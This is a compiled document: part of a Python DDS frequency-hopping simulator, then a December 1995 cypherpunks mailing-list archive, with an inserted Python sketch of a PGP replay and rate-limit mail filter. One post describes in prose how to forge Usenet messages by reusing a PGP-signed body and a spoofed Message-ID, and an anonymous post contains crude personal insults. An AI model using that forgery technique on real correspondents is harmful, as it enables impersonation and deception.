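        self.acc_bits = acc_bits
        self.lut_bits = lut_bits
        self.mask = (1 << acc_bits) - 1
        full_scale = (1 << (dac_bits - 1)) - 1
        # Sine ROM: one full cycle, addressed by the top bits of the phase.
        self.lut = [round(full_scale * math.sin(2 * math.pi * i / (1 << lut_bits)))
                    for i in range(1 << lut_bits)]
        self.phase = 0        # accumulated phase register
        self.increment = 0    # phase increment register (sets the frequency)

    def resolution_hz(self):
        """Smallest frequency step: one LSB of the increment register."""
        return self.clock_hz / (1 << self.acc_bits)

    def tune(self, freq_hz):
        """Reload the increment register only; the phase register is untouched.

        Returns the frequency actually produced after rounding.
        """
        self.increment = round(freq_hz * (1 << self.acc_bits) / self.clock_hz) & self.mask
        return self.increment * self.clock_hz / (1 << self.acc_bits)

    def tick(self):
        """One clock tick: add the increment, look up the DAC code."""
        self.phase = (self.phase + self.increment) & self.mask
        return self.lut[self.phase >> (self.acc_bits - self.lut_bits)]


def run_hops(dds, schedule):
    """Play a hop schedule [(freq_hz, ticks), ...]; return samples and wraps per dwell."""
    samples, wraps = [], []
    for freq_hz, ticks in schedule:
        dds.tune(freq_hz)
        count = 0
        for _ in range(ticks):
            before = dds.phase
            samples.append(dds.tick())
            if dds.phase < before:   # accumulator overflow = one output cycle
                count += 1
        wraps.append(count)
    return samples, wraps


def max_step(samples):
    """Largest jump between consecutive DAC codes, hop boundaries included."""
    return max(abs(b - a) for a, b in zip(samples, samples[1:]))


# Constructed hop schedule: three dwells of 10,000 clock ticks each.
HOPS = [(1_000_000, 10_000), (5_000_000, 10_000), (2_500_000, 10_000)]

if __name__ == "__main__":
    dds = DDS(clock_hz=100_000_000)
    samples, wraps = run_hops(dds, HOPS)
    print("resolution (Hz):", dds.resolution_hz())
    for (freq, ticks), w in zip(HOPS, wraps):
        print(freq, "Hz requested; measured", w * dds.clock_hz / ticks)
    print("largest sample-to-sample step:", max_step(samples))
```

Because a hop only changes the increment, the largest step between consecutive samples is the same at a hop boundary as inside a dwell at the highest frequency.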





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NOT Jonathan Blake <grafolog@netcom.com>
Date: Tue, 26 Dec 1995 08:22:32 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <Pine.SUN.3.91.951225094550.27577E-100000@netcom23>
Message-ID: <Pine.SUN.3.91.951224353450.23327E-100000@netcom23>
MIME-Version: 1.0
Content-Type: text/plain


(No, this is not Jonathan Blake; see .sig below :)

Jonathan Blake <grafolog@netcom.com> writes:
> 	When I get the bugs out of the procmail script I'm
> 	writing, to accomplish this, I'll send it to you.

I'd be very interested. I may even use it, if it works. :)
I like Adam Shostack's suggestion regarding caching hashes of signed
portions of incoming e-mail.
If the filter is going to keep track of e-mail history, then another possible
useful feature would be to limit the number of e-mails accepted from a given
party (even distinct). "Your mail is being returned to you because you're
only authorized to send 10 e-mails here in a 24-hour period". Heh.

> 	However, won't most messages have the name of the intended
> 	recipient inside the PGP signature lines?

Not necessarily. Most e-mails say something like "Dear Alice," but not all.
I wish the important headers were included in the signed portion.

Here's another variant of the same attack:

Bob sends Alice a PGP-signed e-mail. Alice posts a Usenet forgery, making
it look like it came from Bob, and using the same PGP-signed body.

> > Alice _may_ notice that the _Received:_ headers are weird, but this
> > forgery will certainly pass through a script that checks signatures.
>
> 	I'll have to give this some thought.  Have the script
> 	match the from id, with the message id.  << Not sure
> 	how I can do this one, yet.  >>

It's a piece of cake to forge the message-id to match the forged "From:".
In fact, I'll do just that in this article, and I bet it'll take me
less than a minute. Besides, your message-id doesn't match your host. :)

I'm off to teach C++ now. (Yes, on Xmas)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
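
The filter ideas from this thread (cache a hash of the signed part, cap mail per signer, send strangers to a screener), sketched as an added Python example that is not code from any poster. It assumes an upstream PGP check has already verified the signature and passes in the signer's key ID (None when verification failed); the class and function names, the key IDs and the choice of SHA-256 are hypothetical.

```python
import hashlib
from collections import defaultdict, deque

BEGIN_MSG = "-----BEGIN PGP SIGNED MESSAGE-----"
BEGIN_SIG = "-----BEGIN PGP SIGNATURE-----"


def signed_text(raw):
    """Return the canonical clearsigned text of a mail, or None if there is none.

    Mail headers sit outside the BEGIN marker, so they never reach the hash.
    """
    lines = raw.splitlines()
    try:
        start = lines.index(BEGIN_MSG)
        end = lines.index(BEGIN_SIG, start)
    except ValueError:
        return None
    body = lines[start + 1:end]
    while body and body[0].strip():       # skip armor headers such as "Hash:"
        body.pop(0)
    if not body:                          # no blank separator line: malformed
        return None
    canon = []
    for line in body[1:]:
        if line.startswith("- "):         # undo dash-escaping
            line = line[2:]
        canon.append(line.rstrip(" \t"))  # trailing whitespace is not signed
    return "\r\n".join(canon).encode("utf-8")


class Gatekeeper:
    """Replay cache, per-signer quota, and known/stranger routing."""

    def __init__(self, known_keys, max_per_window=10, window=24 * 3600):
        self.known = set(known_keys)
        self.max_per_window = max_per_window
        self.window = window
        self.seen = set()                 # (key_id, sha256 of signed text); unbounded here
        self.recent = defaultdict(deque)  # key_id -> times of accepted mail

    def decide(self, key_id, raw, now):
        """key_id: result of the assumed upstream signature check, or None."""
        text = signed_text(raw)
        if key_id is None or text is None:
            return "reject-unsigned"
        entry = (key_id, hashlib.sha256(text).hexdigest())
        if entry in self.seen:            # same signed body, whatever the headers say
            return "bounce-replay"
        times = self.recent[key_id]
        while times and now - times[0] >= self.window:
            times.popleft()
        if len(times) >= self.max_per_window:
            return "bounce-rate"
        times.append(now)
        self.seen.add(entry)
        return "deliver" if key_id in self.known else "screener"


def make_mail(headers, body_lines):
    """Build a constructed clearsigned mail; the signature block is a placeholder."""
    return "\n".join([headers, "", BEGIN_MSG, "", *body_lines, BEGIN_SIG, "",
                      "(placeholder, not a real signature)",
                      "-----END PGP SIGNATURE-----"])


if __name__ == "__main__":
    gate = Gatekeeper(known_keys={"KEY-BOB"})
    body = ["Dear Alice,", "lunch on Tuesday?", "- -- ", "Bob"]
    first = make_mail("From: bob@example.org\nMessage-ID: <1@example.org>", body)
    # Constructed re-post: new headers, same signed body.
    again = make_mail("From: bob@example.org\nNewsgroups: alt.test", body)
    print(gate.decide("KEY-BOB", first, now=0))
    print(gate.decide("KEY-BOB", again, now=60))
    print(gate.decide("KEY-NEW", make_mail("From: carol@example.org", ["Hello"]), now=120))
```

The replay check works on the signed text alone, so a copy re-sent under different From:, Message-ID: or Newsgroups: headers still hashes to the cached value.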




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 26 Dec 1995 08:16:44 +0800
To: cypherpunks@toad.com
Subject: Bidzos on C-Span 2
Message-ID: <199512252241.RAA26805@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


If you care, Jim is smoothly hawking a beautiful world of 
easy-going crypto on C-Span 2, at least in NYC at 5:35 PM.


At a session in San Francisco, probably a recording.


Jingle jangle.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 26 Dec 1995 08:24:22 +0800
To: cypherpunks@toad.com
Subject: Bidzos Coda
Message-ID: <199512252256.RAA27240@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The Bidzos show was recorded 12/8/95 at the Commonwealth Club 
in SF. It finished here at about 5:45 PM.


Only caught  a piece. Jim was answering written questions about 
a range of crypto and Internet security issues from the 
audience.


Among other things, he says they're working on an encryption 
program "closely tied to the OS of portables, to protect the 
data if the machine is lost or stolen."


He also said, "don't throw tomatoes," but they're doing 
something with "private key escrow" for those who want to 
provide access to their encrypted material in case of death or 
other emergency.


Maybe some other idle sinner saw more, or was at the realtime 
tomato-chucker.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Zerucha <root@deimos.toad.com>
Date: Tue, 26 Dec 1995 09:15:39 +0800
To: Jason Rentz <andr0id@midwest.net>
Subject: Re: ex encrypted script
In-Reply-To: <199512202339.RAA05220@cdale1.midwest.net>
Message-ID: <Pine.LNX.3.91.951225181018.618A-100000@deimos>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, Jason Rentz wrote:

> Forgive me if this is a stupid question.
> 
> I'm using AT&T unix Version 5 release 3.2.2  ( UNIX System V/386 Release 3.2)
> 
> I have several simple scripts that are simple yet handle important realtime
> call processing tasks and remote control operations.  These programs are my
> programs but are running on a system that is dialed into by the vendor once
> in a while.  
> 
> Is there a way to encrypt a script yet still allow it to be runnable?  I
> know that the simple answer is to write it in C and compile it but I don't
> have the means of doing that at the moment.  (i.e. there is no compiler on
> the system)

You can try something similar to what gzexe does, but...

> I thought of a few simple protections but they all involve decrypting before
> running.

...unless the CPU has built in decryption this will be a necessity.  A 
compromise might be to put this into the kernel

zerucha@shell.portal.com
finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Dec 1995 08:36:08 +0800
To: cypherpunks@toad.com
Subject: Re: Bidzos on C-Span 2
Message-ID: <v02120d03ad04dff830d3@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:41 PM 12/25/95, John Young wrote:
>If you care, Jim is smoothly hawking a beautiful world of
>easy-going crypto on C-Span 2, at least in NYC at 5:35 PM.

Actually, he did a pretty good job of toeing the er, party line. Lots of
good opportunities for analogical heavy lifting in arguments with statists.
"Suppose you had a very strong door which protected your whole house and
made it inviolate. Suppose the government then wanted to have a copy of
your door keys on the off-chance you turn into a crack dealer someday...",
etc.

Except for the fact that he wants Uncle to protect his patents, that is...
;-).

This was done on December 8 at the Commonwealth Club in SFO.  Were there
c'punks there? The questions sounded like it...

He also said something about some kind of magic badge with biometric/PK
software which would allow you to work anywhere there was a network
connection. Reminiscent of our discussions about Xerox PARC's ubiquitous
computing stuff, Gerry O'Neil's 2081, etc.

I feel a rant coming on about this "information toaster" stuff, Metcalfe's
fight with Alsop in Infoworld, etc. Guess I'll start it tomorrow. Take
cover everybody...

Merry Christmas!


Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Dec 1995 08:36:41 +0800
To: pam_308bait@thumper.vmeng.com
Subject: (cpx) Re: Bidzos on C-Span 2
Message-ID: <v02120d06ad04e49345ab@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:41 PM 12/25/95, John Young wrote:
>If you care, Jim is smoothly hawking a beautiful world of
>easy-going crypto on C-Span 2, at least in NYC at 5:35 PM.

Actually, he did a pretty good job of toeing the er, party line. Lots of
good opportunities for analogical heavy lifting in arguments with statists.
"Suppose you had a very strong door which protected your whole house and
made it inviolate. Suppose the government then wanted to have a copy of
your door keys on the off-chance you turn into a crack dealer someday...",
etc.

Except for the fact that he wants Uncle to protect his patents, that is...
;-).

This was done on December 8 at the Commonwealth Club in SFO.  Were there
c'punks there? The questions sounded like it...

He also said something about some kind of magic badge with biometric/PK
software which would allow you to work anywhere there was a network
connection. Reminiscent of our discussions about Xerox PARC's ubiquitous
computing stuff, Gerry O'Neil's 2081, etc.

I feel a rant coming on about this "information toaster" stuff, Metcalfe's
fight with Alsop in Infoworld, etc. Guess I'll start it tomorrow. Take
cover everybody...

Merry Christmas!


Cheers,
Bob

--------------------------------------------------
The e$ lists are brought to you by:

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here! Be a charter sponsor for e$pam, e$, and Ne$ws!
e-mail rah@shipwright.com for details...
-------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Dec 1995 08:44:08 +0800
To: cypherpunks@toad.com
Subject: Re: (cpx) Re: Bidzos on C-Span 2
Message-ID: <v02120d00ad04ea1a9222@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Oops.

You can shoot me now...

Sorry, folks! e$pam first and let god sort 'em out.

Fixing that little problem this week, as a matter of fact.

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Tue, 26 Dec 1995 09:37:22 +0800
To: nobody@REPLAY.COM (Anonymous)
Subject: anonther anonymous poster afraid to even tell us who they are
In-Reply-To: <199512252215.XAA07650@utopia.hacktic.nl>
Message-ID: <9512260044.AA14158@all.net>
MIME-Version: 1.0
Content-Type: text


Another anonymous poster tells the cypherpunks to abandon liberty by
abusing it.  When will the cypherpunks learn to stand up to these people?

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 26 Dec 1995 13:26:20 +0800
To: cypherpunks@toad.com
Subject: Assault presses with cop killer computers.
Message-ID: <199512260507.VAA09404@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


While channel surfing around 6PM today on Christmas day, I saw 
President Clinton announce the grave international threat 
posed by terrorists, drug dealers and money launderers wielding 
computers (Only three horsemen -- he left out child pornographers.)

He was immediately followed by an Expert In Television Expertise, 
who told us that computers were getting more and more powerful, and 
doing more and more things, and that Something Must Be Done.

The Expert did not actually use the phrase "The first Amendment was never 
intended to protect modern assault presses using cop killer computers", 
but that was the message.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 26 Dec 1995 12:14:29 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: FH radios
In-Reply-To: <m0tUNYc-0008xnC@pacifier.com>
Message-ID: <199512260358.WAA02279@homeport.org>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:

| Is there actually a restriction on the export of really-fast
| frequency-hopping radios, even those (like cordless phones) which have no
| clear military value?

Yes.  The ITARs restrict the export of any radio which hops faster
than one frequency per second.  (Or ten seconds if it hops between
more than 8 bands.)  See ITAR XIII.b.1.iii.C 
(ftp://ftp.cygnus.com/pub/export/itar.in.full)

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 26 Dec 1995 07:48:00 +0800
To: cypherpunks@toad.com
Subject: Re: corporate bashing
Message-ID: <199512252215.XAA07650@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Fred seems to have been slipping through my filters in recent 
days. Though I usually trash any message containing a reference 
to him, I thought that this latest escalation into the 
ionosphere of net-sillies begs to be brought to heel...

On 24 Dec 95 at 17:20, Fred Cohen wrote:

> and that anonymity should be used as an escape from
> responsibility for what they do and say.  If you want to
> remain free to speak your mind, you have to become
> responsible in at least two ways:
> 
> 	1 - You must stop slandering people.
> 	2 - You must stop using anonymity as a way to avoid being 
>           responsible.
> 
> When I say must, I am not intending to mean anything less. 
> If the cypherpunks continue to do these two things, they will
> rapidly find that they are doing more to destroy all of our
> rights to free speech in the Internet than they ever did to
> encourage freedom of expression.

There are several things wrong with this, but first, just on
the surface: Fred has now dropped his cyberdrawers and stands
before us displaying the ugly engine of his manhood, the handle
by which he maintains a grip on his pointless existence. He
reveals himself to be yet another in that small, tired parade
of self-appointed lightning rods -- people with so little of
import in their lives that they have to resort to trolling for
what they can claim are offenses against them, then flex the
borrowed, imagined musculature of mindless law to rise in
self-righteous threats of exercise of vindictive wrath. 

This is worse than "My big brother will kick your ass!" It is
like a 90-pound weakling going to the beach with a large but
retarded cousin in tow. The idea is to troll to get sand 
kicked in his face, then to point to the drooling cousin and 
use him as a lever to gain and exercise control over the 
hapless dupes of the ruse.

Freds have existed on BBS's, and before the technological age 
in most small clubs and societies. In the Internet they show up 
in newsgroups and on mailing lists, and when crossed they 
ALWAYS descend to threats of legal action. So predictable, so 
utterly dull and unimaginative, they are like the party guest 
who has that inappropriate laugh, who doesn't seem to notice 
that pairs of people are together, who approaches people oddly 
and, in the end, makes a scene and reveals himself to be a 
complete fruitcake. Unmoderated fission looking for a place to 
fulminate.

Fred, you've come to the wrong place. If you want to be
ignored, just pack your terminal and stay home with the
sitcoms. No one asked you to interject your trolls and threats
here. You invited yourself, and whatever you are suffering is 
of your own creation.

Speaking of Freds brings me to a more interesting aspect of 
this nonsense: How do we know there is only one Fred? Fred 
doesn't sign his messages...  oh-oh. This attack of deja vu 
feels like I've had it before.

Why do I get the feeling that Fred is about to embarrass 
himself terribly by blurting out some of the poison that fills 
his soul? Let him who hath not slandered cast the first suit.


We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMN8TVEjw99YhtpnhAQFDngH/cTzEDHzxYZ7Z9jOmoALxaIdxpgpvlIr+
/zsZndz1KfQlqUunH5i7YsJS7tm/XOsrRcWQgKQEr9WaI8wRgrqh5g==
=Hl/v
-----END PGP SIGNATURE-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 26 Dec 1995 17:18:59 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Encryption Discrimination from Sun
In-Reply-To: <199512252216.OAA09495@netcom2.netcom.com>
Message-ID: <199512260855.DAA16540@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike Duvos writes (re: The Java Cup)
> While reading the contest rules, I found the following one
> particularly interesting...
> 
>    "No entries may include encryption as a feature
>     or part of an applet."
[...]
> Doubtless the reason Sun nixed encryption is because this is an
> international contest, and they did not want to deal with legal
> hassles involving international borders and different laws in 
> every country.    

OTOH, they don't have any ITAR-like rules about not installing crypto hooks.

(It's pretty amusing that residents of Romania are eligible to enter, but
not residents of Vermont. At least to me, since I don't live in Vermont. ;) 

> Nonetheless, they seem to have missed an excellent opportunity
> to encourage the migration of privacy software into the new 
> realm they are creating. 

I'm not convinced that such a contest is capable of that anyway. As in most
such contests, entries basically become the property of the sponsor. In this
case, "By participating in the Contest, Contestant waives all claim to 
intellectual property rights in the entry, including patent rights and 
copyright, and waives all moral rights, except where prohibited."  (Wow !
I didn't know I could waive my moral rights !)

I'm not inclined to hand the Java privacy software on which I'm working over
to Sun, even though I like Sun. If I were just working on a Tetris applet or
something, I wouldn't mind....

-Futplex <futplex@pseudonym.com>		Cowboys 37, Cardinals 13; 
			Merry Christmas, 49ers: We'll see you in Dallas !




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Tue, 26 Dec 1995 17:09:50 +0800
To: cypherpunks@toad.com
Subject: HRB Systems Data Storage Encryptor
Message-ID: <199512260845.JAA28578@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Check out http://www.hrb.com/encryption/ssp.html, your
exclusive source of the Ultron Crypto-Engine (tm)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 27 Dec 1995 14:05:55 +0800
To: die@die.com
Subject: Re: FH radios
Message-ID: <m0tUNYc-0008xnC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:06 PM 12/25/95 -0500, you wrote:

>	There is certainly little additional cost to building a
>truly secure digital cordless phone given the dense ASIC technology
>that is standard in this kind of product - but someone has to
>persuade the manufacturers that there is a real need and find a way
>to allow them to export the product.
>
>						Dave Emery  N1PRE

Is there actually a restriction on the export of really-fast
frequency-hopping radios, even those (like cordless phones) which have no
clear military value?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 27 Dec 1995 14:11:05 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: [Rant] Flame threads and factual accuracy
Message-ID: <m0tUNkm-0008yRC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:30 AM 12/25/95 -0500, you (Fred Cohen) wrote:

>With rights come responsibilities.  If you want the right of free speech, you
>have to use it responsibly - otherwise, you will lose the right - and quite
>possibly lose it for me as well.

This commentary is pure bullshit.  If it were possible to quantify it
throughout history, I strongly suspect that the vast majority of instances
where "free speech" was LOST (or was never had in the first place) occurred
NOT because of some objectively agreed-upon ABUSE (irresponsible use) of
that free speech, but in fact merely because those in power WANTED there to
be no free speech.

In short, "losing the right" had NOTHING to do with abuse.  (Though
admittedly, that might be a common excuse given...in lieu of the truth!)


Fred, you richly deserve your bad reputation.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Wed, 27 Dec 1995 14:10:40 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: anonther anonymous poster
In-Reply-To: <9512260044.AA14158@all.net>
Message-ID: <30df67d24001002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, Fred Cohen said:
> 
> 
> Another anonymous poster tells the cypherpunks to abandon liberty by
> abusing it.  When will the cypherpunks learn to stand up to these people.
> 

This is really noise, but I just had a Woody flashback...
All that he'd have to do is change the second sentence to
"When will the cypherpunks learn to evaluate data."

Anyhow, Merry Christmas :)


-- 
Kevin L. Prigge         |"Have you ever gotten tired of hearing those 
UofM Central Computing  | ridiculous AT&T commercials claiming credit 
email: klp@tc.umn.edu   | for things that don't even exist yet? 
010010011101011001100010| You will." -Emmanuel Goldstein 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Wed, 27 Dec 1995 01:17:05 +0800
To: jamesd@echeque.com (James A. Donald)
Subject: Re: Assault presses with cop killer computers.
In-Reply-To: <199512260507.VAA09404@blob.best.net>
Message-ID: <30df89c1456a002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, James A. Donald said:
> 
> While channel surfing around 6PM today on Christmas day, I saw 
> President Clinton announce the grave international threat 
> posed by terrorists, drug dealers and money launderers wielding 
> computers (Only three horsemen -- he left out child pornographers.)

Probably because child pornographers have been dealt with in
the recent bill signed by Bill, which mandates 24-30 months
for transmitting child porn, double if a computer is used.
> 
> He was immediately followed by an Expert In Television Expertise, 
> who told us that computers were getting more and more powerful, and 
> doing more and more things, and that Something Must Be Done.

I'll have to keep an eye on my machine, I think it may be subversive.
Remember, computers don't break laws, people do...

> The Expert did not actually use the phrase "The first Amendment was never 
> intended to protect modern assault presses using cop killer computers", 
> but that was the message.
> 

I'll have to rename my machine black-rhino :)

-- 
Kevin L. Prigge         |"Have you ever gotten tired of hearing those 
UofM Central Computing  | ridiculous AT&T commercials claiming credit 
email: klp@tc.umn.edu   | for things that don't even exist yet? 
010010011101011001100010| You will." -Emmanuel Goldstein 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 27 Dec 1995 11:09:23 +0800
To: cypherpunks@toad.com
Subject: Re: HRB Systems Data Storage Encryptor
Message-ID: <199512261539.HAA04685@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:45 AM 12/26/95 +0100, Anonymous wrote:
>Check out http://www.hrb.com/encryption/ssp.html, your
>exclusive source of the Ultron Crypto-Engine (tm)

The web page proudly announces:
  "is the only NSA-approved Type I data encryptor available today."

There are probably some people ignorant enough to regard that as
a recommendation.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 27 Dec 1995 05:30:18 +0800
To: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Subject: Re: Assault presses with cop killer computers.
Message-ID: <199512261249.HAA01723@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 25, 1995 23:36:00, 'Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>'
wrote: 
 
 
>According to rumor, James A. Donald said: 
>>  
>> While channel surfing around 6PM today on Christmas day, I saw  
>> President Clinton announce the grave international threat  
>> posed by terrorists, drug dealers and money launderers wielding  
>> computers (Only three horsemen -- he left out child pornographers.) 
> 
>Probably because child pornographers have been dealt with in 
>the recent bill signed by Bill, which mandates 24-30 months 
>for transmitting child porn, double if a computer is used. 
> 
 
see Reuters, "Clinton acts to tougher penalties" 23 Dec 95 08:40 
clari.news.crime.sex 
Message-ID: <Rclinton-pornographyURN-1_5DN@clari.net> 
 
see AP, "Clinton signs porn bill," 23 Dec 95 09:40 
clari.news.crime.sex 
Message-ID: <Aclinton-pornoURCBj_5DN@clari.net> 
 
What is most interesting is how far the four horsemen have rampaged and the
destruction they have already done. 
 
The internet is not the *least* regulated as those pushing for "tougher
penalties" claim. One can argue, using the new federal doubling of prison
terms when computers are used, that it is the *most* regulated. 
 
One can also see how far the combination of sexual hysteria and fear of new
technology has fed into and been used by politicians from throughout the
political spectrum. 
 
It also shows how much of the government threat to privacy is a social, not
a technological, issue. 
 
While people argue about heat-death-of-the-universe encryption algos, a
different form of hot air is producing the heat death of civil liberties. 
 
While cyber-libertarians talk about how strong crypto algos are needed to
protect property and how "the statists in Washington" are trying to take
away their crypto, right-wing pro-capitalist politicians have already taken
away civil liberties. 
 
While crypto-radicals talk about how strong crypto algos are needed to lead
the revolution and how "the nazis in Washington" are trying to take away
their crypto, sexual hysterics calling themselves "radical feminists" have
already helped take away many civil liberties. 
 
I support strong crypto. I support powerful and secure algos. I see it as a
wonderful development of technology to protect individual privacy. 
 
But privacy is only one right of the citizen; it is only one of the many
civil liberties under attack. 
 
I am also disturbed by the number of discussions on the list that may be on
topic but avoid *these* social issues, E.G. 
 
     Army vs. Navy Captain? 
     how cheap is AT&T? 
     Bizdos: confused executive vs. conspiratorial swine? 
     Are CFS programmers being treated nicely? 
     Fred Cohen: nice guy victim or swine? 
     Why Alice should use PGP. 
 
Ever heard of bit fiddlin' while Rome burns? 
 
--tallpaul 
      
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Wed, 27 Dec 1995 07:20:18 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: Only accepting e-mail from known parties
Message-ID: <v02140a02ad04b40c72a1@[165.254.158.223]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:33 12/25/95, tallpaul wrote:

>Thoughts? (I see one problem with this but it should be able to be worked
>out once the basic method is agreed to).

I assume that the "Problem" is that by only giving each correspondent ONE
E-Stamp, you are single streaming your connections with them (ie: Are
talking Half-Duplex). Not only are they restricted to one message
"in-flight" but they can not start another message until they have done a
capture run to acquire your ACK and get the new key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kdf@gigo.com (John Erland)
Date: Wed, 27 Dec 1995 14:20:09 +0800
To: cypherpunks@toad.com
Subject: Mix Ported to DOS Yet?
Message-ID: <e26_9512260946@gigo.com>
MIME-Version: 1.0
Content-Type: text/plain



[Please respond netmail, as I have but periodic contact w/list.]

Subject says it all:  Has anyone ported Mixmaster to DOS yet?  It has
been impending for about a year, it seems, but no one had actually done
it last time I asked.

Thanks for any new info...

        JE
--
: Fidonet:  John Erland 1:203/8055.12  .. speaking for only myself.
: Internet: kdf@gigo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 Dec 1995 04:11:49 +0800
To: cypherpunks@toad.com
Subject: Rawbutt Day
Message-ID: <199512261643.LAA28628@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Rasping rawbutts for National Whiners Day here's a duo 
   of pinhole puckers about the shut-your-filthy-hole bill:

----------

   The Wash Post, Dec 25, 1995:

   Internet Football

   The Internet provisions are still in flux along with the
   rest of the host telecommunications bill, in which this
   newspaper and its parent company have an interest. If these
   provisions go through in anything like their present form,
   then their vulnerability to challenge on First Amendment
   grounds seems clear. It makes sense for a court to sort out
   the constitutional from the technical aspects of this new
   form of "speech," and the sooner the better.

